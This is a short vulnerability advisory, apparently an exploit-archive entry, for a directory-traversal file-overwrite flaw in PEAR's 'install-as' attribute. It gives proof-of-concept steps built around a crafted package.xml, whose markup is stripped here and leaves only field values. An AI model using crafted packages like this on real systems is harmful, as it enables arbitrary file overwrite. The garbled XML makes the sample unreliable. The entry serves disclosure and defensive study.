source: https://www.securityfocus.com/bid/24111/info PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files. An attacker-supplied package may supply directory-traversal strings through the 'install-as' attribute to create and overwrite files in arbitrary locations. This issue affects PEAR 1.0 to 1.5.3. create a file named "INSTALL" and save it in the current directory. Save the following XML as package.xml, and run "pear install package.xml" If php_dir is /usr/local/lib/php The file "INSTALL" will be installed into /usr/local/test.php Test_Sec pear.php.net Test security vulnerability demonstrate install-as vulnerability Greg Beaver cellog cellog@php.net yes 2007-03-05 1.6.0 1.6.0 stable stable PHP License allow up to latest beta version [tias] 4.3.0 1.4.3